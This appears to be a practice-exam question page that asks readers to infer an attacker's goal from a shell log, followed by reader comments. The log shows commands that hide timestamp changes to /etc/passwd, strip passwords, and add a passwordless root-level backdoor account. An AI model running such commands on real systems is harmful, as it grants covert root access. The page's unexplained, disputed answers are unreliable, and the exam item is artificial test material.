what is the attacker ultimately trying to achieve as inferred from the log sequence?

After studying the following log entries, what is the attacker ultimately trying to achieve as inferred from the log sequence?
1. mkdir -p /etc/X11/applnk/Internet/.etc
2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd
3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
4. touch -acmr /etc /etc/X11/applnk/Internet/.etc
5. passwd nobody -d
6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
7. passwd dns -d
8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
9. touch -acmr /etc/X11/applnk/Internet/.etc /etc

After studying the following log entries, what is the attacker ultimately trying to achieve as inferred from the log sequence?

1. mkdir -p /etc/X11/applnk/Internet/.etc
2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd
3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
4. touch -acmr /etc /etc/X11/applnk/Internet/.etc
5. passwd nobody -d
6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
7. passwd dns -d
8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
9. touch -acmr /etc/X11/applnk/Internet/.etc /etc

A.
Change password of user nobody

B.
Extract information from a local directory

C.
Change the files Modification Access Creation times

D.
Download rootkits and passwords into a new directory

Explanation:
:



Leave a Reply 4

Your email address will not be published. Required fields are marked *


Satshop

Satshop

I was very pleased to find your website.I wanted to thanks for your time for this nice article!!

I definitely enjoying every little bit of it and I have you bookmarked to check out new stuff you blog post.

Best regards Alex

Guest

Guest

I think its wrong and the answer is A and C.

Does “passwd username” not change the usernames password?

I’m not sure what -d does. Could that be the new password?

Guest

Guest

-d is to delete password. That will make user “nobody” password less. C is correct as touch is used to change time stamp also. Option details are given below

-a Change only the access time.
-c, –no-create Do not create any files.
-m Change only the modification time.
-r, –reference=FILE Use this FILE’s times instead of current time.

Regards,